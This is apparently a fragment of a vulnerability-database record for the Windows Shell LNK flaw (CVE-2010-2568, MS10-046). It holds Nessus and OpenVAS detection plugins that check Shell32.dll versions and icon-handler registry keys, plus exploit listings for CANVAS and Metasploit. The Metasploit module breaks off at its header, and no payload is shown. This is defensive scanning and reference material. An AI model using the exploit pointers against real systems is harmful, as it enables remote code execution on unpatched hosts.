script_xref(name:\"Secunia\", value:\"40647\");\n script_xref(name:\"MSKB\", value:\"2286198\");\n\n script_name(english:\"MS10-046: Vulnerability in Windows Shell Could Allow Remote Code Execution (2286198) (EASYHOOKUP)\");\n script_summary(english:\"Checks version of shell32.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote windows host is affected by a remote code execution\nvulnerability.\");\n\n script_set_attribute(attribute:\"description\", value:\n\"The remote windows host contains a version of the Windows Shell that\ncontains a vulnerability in the way it handles shortcut icons. An\nattacker, exploiting this flaw, can execute arbitrary commands on the\nremote host subject to the privileges of the user opening the\nshortcut.\n\nEASYHOOKUP is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2017/04/14 by a group known as the Shadow\nBrokers.\");\n\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-046\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows XP, 2003, Vista,\n2008, 7, and 2008 R2.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows Shell LNK Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/08/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS10-046';\nkbs = make_list(\"2286198\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'2,3', win2003:'2', vista:'1,2', win7:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nkb = '2286198';\nif (\n # Windows 7 / Server 2008 R2\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Shell32.dll\", version:\"6.1.7600.16644\", min_version:\"6.1.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Shell32.dll\", version:\"6.1.7600.20765\", min_version:\"6.1.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Shell32.dll\", version:\"6.0.6002.18287\", min_version:\"6.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Shell32.dll\", version:\"6.0.6002.22454\", min_version:\"6.0.6002.22000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Shell32.dll\", version:\"6.0.6001.18505\", min_version:\"6.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Shell32.dll\", version:\"6.0.6001.22735\", min_version:\"6.0.6001.22000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 and XP x64\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Shell32.dll\", version:\"6.0.3790.4751\", dir:\"\\System32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP\n hotfix_is_vulnerable(os:\"5.1\", arch:\"x86\", file:\"Shell32.dll\", version:\"6.0.2900.6018\", dir:\"\\System32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/MS10-046\", value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T06:15:28", "description": "Windows Shell does not properly validate the parameters of a shortcut\nfile when loading its icon. Attempting to parse the icon of a\nspecially crafted shortcut file can result in arbitrary code\nexecution. A remote attacker could exploit this by tricking a user\ninto viewing a malicious shortcut file via Windows Explorer, or any\nother application that parses the shortcut's icon. This can also be\nexploited by an attacker who tricks a user into inserting removable\nmedia containing a malicious shortcut (e.g. CD, USB drive), and\nAutoPlay is enabled.\n\nEASYHOOKUP is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2017/04/14 by a group known as the Shadow\nBrokers.", "edition": 33, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2010-07-18T00:00:00", "title": "MS KB2286198: Windows Shell Shortcut Icon Parsing Arbitrary Code Execution (EASYHOOKUP)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2568"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_KB_2286198.NASL", "href": "https://www.tenable.com/plugins/nessus/47750", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(47750);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\n\n script_cve_id(\"CVE-2010-2568\");\n script_bugtraq_id(41732);\n script_xref(name:\"CERT\", value:\"940193\");\n script_xref(name:\"EDB-ID\", value:\"14403\");\n script_xref(name:\"MSFT\", value:\"MS10-046\");\n script_xref(name:\"Secunia\", value:\"40647\");\n script_xref(name:\"MSKB\", value:\"2286198\");\n\n script_name(english:\"MS KB2286198: Windows Shell Shortcut Icon Parsing Arbitrary Code Execution (EASYHOOKUP)\");\n script_summary(english:\"Checks if displaying shortcut icons has been disabled\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"It may be possible to execute arbitrary code on the remote Windows\nhost using a malicious shortcut file.\");\n script_set_attribute(attribute:\"description\", value:\n\"Windows Shell does not properly validate the parameters of a shortcut\nfile when loading its icon. Attempting to parse the icon of a\nspecially crafted shortcut file can result in arbitrary code\nexecution. A remote attacker could exploit this by tricking a user\ninto viewing a malicious shortcut file via Windows Explorer, or any\nother application that parses the shortcut's icon. This can also be\nexploited by an attacker who tricks a user into inserting removable\nmedia containing a malicious shortcut (e.g. CD, USB drive), and\nAutoPlay is enabled.\n\nEASYHOOKUP is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2017/04/14 by a group known as the Shadow\nBrokers.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2010/2286198\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-046\"\n );\n script_set_attribute(attribute:\"solution\", value:\n\"Either apply the MS10-046 patch or disable the displaying of shortcut\nicons (refer to the Microsoft advisory).\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows Shell LNK Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"smb_nt_ms10-046.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\n\n\nget_kb_item_or_exit('SMB/WindowsVersion');\nif (hotfix_check_sp(xp:4, win2003:3, vista:3, win7:1) <= 0)\n exit(0, 'Host is not affected based on its version / service pack.');\nif (!get_kb_item(\"SMB/Missing/MS10-046\")) exit(0, \"The host is not affected because the 'SMB/Missing/MS10-046' KB item is missing.\");\n\n# Connect to the appropriate share.\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\nport = kb_smb_transport();\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:\"IPC$\");\nif (rc != 1)\n{\n NetUseDel();\n exit(1, \"Can't connect to IPC$ share.\");\n}\n\nhkcr = RegConnectRegistry(hkey:HKEY_CLASS_ROOT);\nif (isnull(hkcr))\n{\n NetUseDel();\n exit(1, \"Can't connect to remote registry.\");\n}\n\nkeys = make_list(\n 'lnkfile\\\\shellex\\\\IconHandler',\n 'piffile\\\\shellex\\\\IconHandler'\n);\n\nvuln = make_array();\n\nforeach key (keys)\n{\n key_h = RegOpenKey(handle:hkcr, key:key, mode:MAXIMUM_ALLOWED);\n icon_handler = NULL;\n\n if (!isnull(key_h))\n {\n value = RegQueryValue(handle:key_h, item:NULL);\n if (!isnull(value[1])) vuln[key] = value[1];\n RegCloseKey(handle:key_h);\n }\n}\n\nRegCloseKey(handle:hkcr);\nNetUseDel();\n\nif (max_index(keys(vuln)) > 0)\n{\n if (report_verbosity > 0)\n {\n if (max_index(keys(vuln)) > 1) s = 'ies';\n else s = 'y';\n report =\n '\\nAccording to the following registry entr'+s+', displaying shortcut' +\n '\\nicons has not been disabled :\\n';\n\n foreach key (keys(vuln))\n {\n report +=\n '\\n Key : HKEY_CLASS_ROOT\\\\' + key +\n '\\n Value : ' + vuln[key] + '\\n';\n }\n\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse exit(0, 'Displaying shortcut icons has been disabled.');\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2019-05-29T17:19:30", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2568"], "description": "**Name**| windows_shell_lnk \n---|--- \n**CVE**| CVE-2010-2568 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| windows_shell_lnk \n**Notes**| CVE Name: CVE-2010-2568 \nVENDOR: Microsoft \nNotes: \n \nVersionsAffected: Windows XP, Windows 2003, Windows Vista, Windows 2008, Windows 7 \nRepeatability: Infinite \nReferences: ['http://www.microsoft.com/technet/security/advisory/2286198.mspx'] \nDate public: 07/20/2010 \nMSADV: MS10-0XX \n\n", "edition": 2, "modified": "2010-07-22T05:43:00", "published": "2010-07-22T05:43:00", "id": "WINDOWS_SHELL_LNK", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/windows_shell_lnk", "type": "canvas", "title": "Immunity Canvas: WINDOWS_SHELL_LNK", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-04-27T19:23:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2568"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-046.", "modified": "2020-04-23T00:00:00", "published": "2010-08-04T00:00:00", "id": "OPENVAS:1361412562310902226", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902226", "type": "openvas", "title": "Microsoft Windows Shell Remote Code Execution Vulnerability (2286198)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Shell Remote Code Execution Vulnerability (2286198)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Updated By: Madhuri D <dmadhuri@secpod.com> on 2010-11-13\n# - To detect file version 'Shell32.dll' on vista, win 2008 and win 7\n#\n# Copyright:\n# Copyright (C) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902226\");\n script_version(\"2020-04-23T12:22:09+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 12:22:09 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-08-04 08:26:41 +0200 (Wed, 04 Aug 2010)\");\n script_cve_id(\"CVE-2010-2568\");\n script_bugtraq_id(41732);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Windows Shell Remote Code Execution Vulnerability (2286198)\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/940193\");\n script_xref(name:\"URL\", value:\"http://www.ivanlef0u.tuxfamily.org/?p=411\");\n script_xref(name:\"URL\", value:\"http://isc.sans.edu/diary.html?storyid=9190\");\n script_xref(name:\"URL\", value:\"http://isc.sans.edu/diary.html?storyid=9181\");\n script_xref(name:\"URL\", value:\"http://community.websense.com/blogs/securitylabs/archive/2010/07/20/microsoft-lnk-vulnerability-brief-technical-analysis-cve-2010-2568.aspx\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/registry_enumerated\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to automatically execute\n a malicious binary by tricking a user into browsing a remote network or WebDAV\n share, or opening in Windows Explorer a removable drive containing a specially\n crafted shortcut file.\");\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7\n\n - Microsoft Windows XP Service Pack 3 and prior\n\n - Microsoft Windows 2003 Service Pack 2 and prior\n\n - Microsoft Windows Vista Service Pack 1/2 and prior\n\n - Microsoft Windows Server 2008 Service Pack 1/2 and prior\");\n script_tag(name:\"insight\", value:\"The flaw is due to an error in Windows 'Shell' when parsing shortcuts\n (.lnk or .pif), certain parameters are not properly validated when attempting\n to load the icon.\");\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS10-046.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-046\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win7:1, win2008:3) <= 0){\n exit(0);\n}\n\nif(hotfix_missing(name:\"2286198\") == 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(sysPath)\n{\n dllVer = fetch_file_version(sysPath:sysPath, file_name:\"Shell32.dll\");\n if(!dllVer){\n exit(0);\n }\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 3\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.2900.6018\")){\n report = report_fixed_ver(installed_version:dllVer, fixed_version:\"6.0.2900.6018\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.3790.4751\")){\n report = report_fixed_ver(installed_version:dllVer, fixed_version:\"6.0.3790.4751\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nsysPath = smb_get_system32root();\nif(sysPath)\n{\n dllVer = fetch_file_version(sysPath:sysPath, file_name:\"Shell32.dll\");\n if(!dllVer){\n exit(0);\n }\n}\n\nif(hotfix_check_sp(winVista:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.6001.18505\")){\n report = report_fixed_ver(installed_version:dllVer, fixed_version:\"6.0.6001.18505\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.6002.18287\")){\n report = report_fixed_ver(installed_version:dllVer, fixed_version:\"6.0.6002.18287\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.6001.18505\")){\n report = report_fixed_ver(installed_version:dllVer, fixed_version:\"6.0.6001.18505\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.6002.18287\")){\n report = report_fixed_ver(installed_version:dllVer, fixed_version:\"6.0.6002.18287\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win7:1) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.1.7600.16644\")){\n report = report_fixed_ver(installed_version:dllVer, fixed_version:\"6.1.7600.16644\", install_path:sysPath);\n security_message(port: 0, data: report);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:09:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2568"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-046.", "modified": "2017-04-11T00:00:00", "published": "2010-08-04T00:00:00", "id": "OPENVAS:902226", "href": "http://plugins.openvas.org/nasl.php?oid=902226", "type": "openvas", "title": "Microsoft Windows Shell Remote Code Execution Vulnerability (2286198)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms10-046.nasl 5934 2017-04-11 12:28:28Z antu123 $\n#\n# Microsoft Windows Shell Remote Code Execution Vulnerability (2286198)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Updated By: Madhuri D <dmadhuri@secpod.com> on 2010-11-13\n# - To detect file version 'Shell32.dll' on vista, win 2008 and win 7\n# \n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_id(902226);\n script_version(\"$Revision: 5934 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-11 14:28:28 +0200 (Tue, 11 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-08-04 08:26:41 +0200 (Wed, 04 Aug 2010)\");\n script_cve_id(\"CVE-2010-2568\");\n script_bugtraq_id(41732);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Windows Shell Remote Code Execution Vulnerability (2286198)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/40647\");\n script_xref(name : \"URL\" , value : \"http://www.kb.cert.org/vuls/id/940193\");\n script_xref(name : \"URL\" , value : \"http://www.ivanlef0u.tuxfamily.org/?p=411\");\n script_xref(name : \"URL\" , value : \"http://isc.sans.edu/diary.html?storyid=9190\");\n script_xref(name : \"URL\" , value : \"http://isc.sans.edu/diary.html?storyid=9181\");\n script_xref(name : \"URL\" , value : \"http://community.websense.com/blogs/securitylabs/archive/2010/07/20/microsoft-lnk-vulnerability-brief-technical-analysis-cve-2010-2568.aspx\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"impact\" , value : \"Successful exploitation could allow remote attackers to automatically execute\n a malicious binary by tricking a user into browsing a remote network or WebDAV\n share, or opening in Windows Explorer a removable drive containing a specially\n crafted shortcut file.\n Impact Level: System\");\n script_tag(name : \"affected\" , value : \"Micorsoft Windows 7\n Microsoft Windows XP Service Pack 3 and prior.\n Microsoft Windows 2003 Service Pack 2 and prior.\n Microsoft Windows Vista Service Pack 1/2 and prior.\n Microsoft Windows Server 2008 Service Pack 1/2 and prior.\");\n script_tag(name : \"insight\" , value : \"The flaw is due to an error in Windows 'Shell' when parsing shortcuts\n (.lnk or .pif), certain parameters are not properly validated when attempting\n to load the icon.\");\n script_tag(name : \"solution\" , value : \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://www.microsoft.com/technet/security/Bulletin/MS10-046.mspx\");\n script_tag(name : \"summary\" , value : \"This host is missing a critical security update according to\n Microsoft Bulletin MS10-046.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win7:1, win2008:3) <= 0){\n exit(0);\n}\n\n# Check for MS10-046 Hotfix\nif(hotfix_missing(name:\"2286198\") == 0){\n exit(0);\n}\n\n## Get System32 path\nsysPath = smb_get_system32root();\nif(sysPath)\n{\n dllVer = fetch_file_version(sysPath, file_name:\"Shell32.dll\");\n if(!dllVer){\n exit(0);\n }\n}\n\n# Windows XP\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 3\" >< SP)\n {\n # Grep for Shell32.dll version < 6.0.2900.6018\n if(version_is_less(version:dllVer, test_version:\"6.0.2900.6018\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n# Windows 2003\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for Shell32.dll version < 6.0.3790.4751\n if(version_is_less(version:dllVer, test_version:\"6.0.3790.4751\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Get System32 path\nsysPath = smb_get_system32root();\nif(sysPath)\n{\n dllVer = fetch_file_version(sysPath, file_name:\"Shell32.dll\");\n if(!dllVer){\n exit(0);\n }\n}\n\n# Windows Vista\nif(hotfix_check_sp(winVista:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n # Grep for Shell32.dll version < 6.0.6001.18505 \n if(version_is_less(version:dllVer, test_version:\"6.0.6001.18505\")){\n security_message(0);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for Shell32.dll version < 6.0.6002.18287\n if(version_is_less(version:dllVer, test_version:\"6.0.6002.18287\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n# Windows Server 2008\nelse if(hotfix_check_sp(win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n if(\"Service Pack 1\" >< SP)\n {\n # Grep for Shell32.dll version < 6.0.6001.18505\n if(version_is_less(version:dllVer, test_version:\"6.0.6001.18505\")){\n security_message(0);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n # Grep for Shell32.dll version < 6.0.6002.18287\n if(version_is_less(version:dllVer, test_version:\"6.0.6002.18287\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n# Windows 7\nelse if(hotfix_check_sp(win7:1) > 0)\n{\n # Grep for Shell32.dll version < 6.1.7600.16644\n if(version_is_less(version:dllVer, test_version:\"6.1.7600.16644\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T00:10:11", "description": "Microsoft Windows Shell LNK Code Execution. CVE-2010-2568. Remote exploit for windows platform", "published": "2010-09-21T00:00:00", "type": "exploitdb", "title": "Microsoft Windows Shell LNK Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2568"], "modified": "2010-09-21T00:00:00", "id": "EDB-ID:16574", "href": "https://www.exploit-db.com/exploits/16574/", "sourceData": "##\r\n# $Id: ms10_046_shortcut_icon_dllloader.rb 10404 2010-09-21 00:13:30Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\t#\r\n\t# This module acts as an HTTP server\r\n\t#\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::EXE\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t\t=> 'Microsoft Windows Shell LNK Code Execution',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the handling of 